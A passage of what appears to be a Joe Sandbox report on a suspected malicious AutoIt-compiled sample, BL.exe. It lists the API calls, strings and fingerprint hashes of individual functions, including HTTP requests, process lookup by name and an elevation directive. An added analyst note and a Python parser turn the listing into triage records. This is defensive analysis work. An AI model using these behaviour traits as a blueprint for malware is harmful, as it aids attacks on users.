  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• lstrcmpiW.KERNEL32(?,?), ref: 0045355E
• MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 978794511-0
                                                                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                              • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                              • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2014098862-0
                                                                                                                            • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                            • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                            • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                            • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                            • String ID: AU3_FreeVar
                                                                                                                            • API String ID: 2184576858-771828931
                                                                                                                            • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                            • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                            • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                            • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1291720006-3916222277
                                                                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastselect
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 215497628-2761332787
                                                                                                                            • Opcode ID: cde8accdca829d9983e03de59e67da7c6bf461f8c0dbfe7f64911849eea10562
                                                                                                                            • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                            • Opcode Fuzzy Hash: cde8accdca829d9983e03de59e67da7c6bf461f8c0dbfe7f64911849eea10562
                                                                                                                            • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                            • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                            • API String ID: 1729044348-3708979750
                                                                                                                            • Opcode ID: bcf3ca565e1fb392723d3e06de7fa0d6b980a33582063796cf81a7d85c8f329b
                                                                                                                            • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                            • Opcode Fuzzy Hash: bcf3ca565e1fb392723d3e06de7fa0d6b980a33582063796cf81a7d85c8f329b
                                                                                                                            • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                            • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                            • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                            • _wcslen.LIBCMT ref: 0044BCCB
• SHFileOperationW.SHELL32 ref: 0044BD16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
• Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
• Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
• Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
APIs
  • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
• _wcslen.LIBCMT ref: 004366DD
• GetFileAttributesW.KERNEL32(?), ref: 00436700
• GetLastError.KERNEL32 ref: 0043670F
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
• _wcsrchr.LIBCMT ref: 0043674C
  • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
• Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
• Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
• Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
• Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
• Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
• Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
APIs
• EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
• OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
• GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
• __wsplitpath.LIBCMT ref: 00436FA0
• _wcscat.LIBCMT ref: 00436FB2
• __wcsicoll.LIBCMT ref: 00436FC4
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
• String ID:
• API String ID: 2903788889-0
• Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
• Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
• Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
• Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
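Two of the blocks above are the ones an analyst pivots on: the block whose String ID is #OnAutoItStartRegister$#notrayicon$#requireadmin (these are AutoIt script directives, which points to an embedded AutoIt interpreter; #requireadmin is the directive that makes a script demand elevation), and the EnumProcesses / OpenProcess / EnumProcessModules / GetModuleBaseNameW / __wcsicoll / CloseHandle block, which walks every process and compares each image base name case-insensitively, i.e. a lookup of a process by name. The Opcode ID and Instruction Fuzzy Hash lines are the values to search other reports for. The parser below is an added example, not Joe Sandbox code: it turns this block layout into records, separates a function's own API calls from the "Part of subcall function" entries, checks call ordering, and splits the '$'-joined String ID list. Its input is an abridged copy of those two blocks with the leading whitespace and "Download File" link text removed; the field layout is inferred only from the blocks on this page, and every helper name is mine.

```python
"""Parse Joe Sandbox per-function fingerprint blocks into records for triage.
Added example for this report page, not Joe Sandbox code; the field layout is
inferred only from the blocks on this page, and SAMPLE is an abridged copy of two
of them (leading whitespace and "Download File" link text removed)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
APIs
• EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
• OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
• GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
• __wsplitpath.LIBCMT ref: 00436FA0
• _wcscat.LIBCMT ref: 00436FB2
• __wcsicoll.LIBCMT ref: 00436FC4
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
Similarity
• API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
• String ID:
• Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?([\w@$]+)\."
                    r"([A-Za-z0-9]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")  # "• Key: value"


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]         # "?" is an argument the sandbox could not resolve
    ref: int                # call-site address
    subcall_of: int | None  # callee address for "Part of subcall function" entries


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)     # raw lines under "Strings"
    associated: list[str] = field(default_factory=list)  # related dumps of the same image
    meta: dict[str, str] = field(default_factory=dict)   # Opcode ID, fuzzy hashes, ...

    @property
    def string_ids(self) -> list[str]:
        """Strings the function references; the report joins them with '$'."""
        return [s for s in self.meta.get("String ID", "").split("$") if s]


def parse_blocks(text: str) -> list[FunctionBlock]:
    blocks: list[FunctionBlock] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADINGS:
            if line == "APIs":                 # every block opens with this heading
                current = FunctionBlock()
                blocks.append(current)
            section = line
        elif not line or current is None:     # blank, or the tail of a cut-off block
            continue
        elif section == "APIs":
            if m := API_RE.match(line):
                sub, name, module, args, ref = m.groups()
                current.apis.append(ApiCall(name, module, args.split(",") if args else [],
                                            int(ref, 16), int(sub, 16) if sub else None))
        elif section == "Strings":
            current.strings.append(line.lstrip("• "))
        elif m := FIELD_RE.match(line):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Associated":
                current.associated.append(value)
            else:
                current.meta[key] = value
    return blocks


def calls_in_order(block: FunctionBlock, names: list[str]) -> bool:
    """True if `names` occur in that order (gaps allowed) among the block's own calls."""
    seen = iter(c.name for c in block.apis if c.subcall_of is None)
    return all(any(n == s for s in seen) for n in names)


def blocks_with_string_prefix(blocks: list[FunctionBlock], prefix: str) -> list[FunctionBlock]:
    return [b for b in blocks if any(s.startswith(prefix) for s in b.string_ids)]


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE)
    for b in blocks_with_string_prefix(parsed, "#"):   # AutoIt directives start with '#'
        print("directives:", b.string_ids, "Opcode ID:", b.meta["Opcode ID"])
    walk = ["EnumProcesses", "OpenProcess", "EnumProcessModules", "GetModuleBaseNameW", "CloseHandle"]
    print("process-by-name walk at:", ["%08X" % b.apis[0].ref for b in parsed if calls_in_order(b, walk)])
```

Run as a script it prints the directive strings with their Opcode ID and the call-site address of the process walk. Fed the whole function listing (indentation stripped), it yields one record per block; subcall entries are kept but excluded from the ordering check because they describe a callee, not the function itself, and the Opcode ID values can then be searched in other Joe Sandbox reports to find functions shared with other samples.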
APIs
• DeleteObject.GDI32(?), ref: 0044157D
• GetDC.USER32(00000000), ref: 00441585
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
• ReleaseDC.USER32(00000000,00000000), ref: 0044159B
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
• Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
APIs
• _memset.LIBCMT ref: 00401257
  • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
  • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
  • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
  • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
• KillTimer.USER32(?,?), ref: 004012B0
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
• Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 1792922140-0
• Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
• Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
• Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
• Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
APIs
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
